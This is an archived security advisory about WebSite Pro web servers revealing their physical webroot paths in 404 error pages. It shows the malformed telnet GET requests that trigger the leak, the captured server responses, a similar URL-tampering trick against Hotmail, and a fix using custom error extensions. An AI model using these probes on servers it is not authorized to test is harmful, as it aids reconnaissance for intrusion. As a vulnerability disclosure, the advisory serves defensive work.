WebSite Pro is also revealing the webdirectory of each Website by a simple command line. This bug is similar to the "IIS revealing webdirectories" bug reported. On WebSitePro the diference ist the way you retrieve the path.
70b108388a2f189b10b9a7b6a8056ebcc7c966497f269b5fed0b43153d271e8d<!DOCTYPE HTML PUBLIC "html.dtd">
<HTML>
<BODY BGCOLOR="#000000" TEXT="#FFFFFF"><PRE>
<FONT COLOR="#CC0000">COMMAND</FONT>
WebSite Pro
<FONT COLOR="#CC0000">SYSTEMS AFFECTED</FONT>
WebSitePro 2.3.18
<FONT COLOR="#CC0000">PROBLEM</FONT>
Lark Lizerman found following. WebSite Pro is also revealing the
webdirectory of each Website by a simple command line. This bug
is similar to the "IIS revealing webdirectories" bug reported.
On WebSitePro the diference ist the way you retrieve the path.
Example (Made with MS Windows Telnet Client):
Logfile:
========
<FONT COLOR="#00FF00">
GET /HTTP1.0\ <------ Our command we send via Telnet on port 80 to the webserver
Response:
Content-length: 186
<HTML><HEAD><TITLE>Document Moved</TITLE></HEAD>
<BODY bgcolor="White"><H2>Document Moved</H2>
This document has moved <A HREF="http://www.akte.net/HTTP1.0/">here </A>.<P>
</BODY></HTML>
GET /HTTP1.0/
Content-length: 230
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/HTTP1.0/<P>(D:\WEBROOTS\VHOSTS\aktenet\htdocs\HTTP1.0)</CODE><P>
</BODY></HTML>
</FONT>
Here it shows us, that the HTML files are in
D:\WEBROOTS\VHOSTS\aktenet\htdocs. It's not a large threat but
an attacker might gain information about the server which should
stay in Admin's hands. On all Webservers e.g. MS IIS and Apache
the response is "error 404".
A tip from Noah Rathaus about WebSite Pro latest version(2.4.9).
He mentioned a server where WebSite Pro. 2.4.9 is run. He
discovered, that also the latest version is vulnerable to the bug
of revealing webdirectories. In the new version there must be
made a change to retrieve the directoryname. When you connect to
a server send the command line:
<FONT COLOR="#00FF00">
GET /HTTP1.0 \
</FONT>
You have now to add a space before the last backspace of the
commandline. That makes the server respond with a "404" error and
and prints the directoryname. Here is the part from the logfile
of Windows Telnet Client (website.oreilly.com):
<FONT COLOR="#00FF00">
GET /HTTP1.0 \
HTTP/1.0 404 Not Found
Date: Thu, 13 Jan 2000 20:47:12 GMT
Server: WebSitePro/2.4.9
Accept-ranges: bytes
Content-type: text/html
Content-length: 216
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/HTTP1.0<P>(c:\1Web\docs\website\HTTP1.0)</CODE><P>
</BODY></HTML>
</FONT>
Here it shows us the directory "c:\1Web\docs\website\".
Hotmail? Get into your Hotmail account. After you are logged in,
modify in the string address the part with "disk=216.33.148.68_"
in something like "disk="abc.beh.doh.cih_". Put string text in
the place of the IP address. It will give you a nice error
revealing directory structure of server and you will be able to
understand after this a big part of address string.
<FONT COLOR="#CC0000">SOLUTION</FONT>
Vendor contacted and informed about the bug. Expecting statement
about fix. Every version of website (1.x, 2.x) seen behaves like
this in standard configuration. However you can avoid the
revealing of webdirectories by installing either one of two freely
available WSAPI extensions which then send out custom 404, 403
and 401 messages. For more information see:
<FONT COLOR="#00FF00">
http://software.oreilly.com/techsupport/kb/website_kb_article_display_frame.cfm?ID_KBArticle=102
</FONT>
</PRE></BODY>
</HTML>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed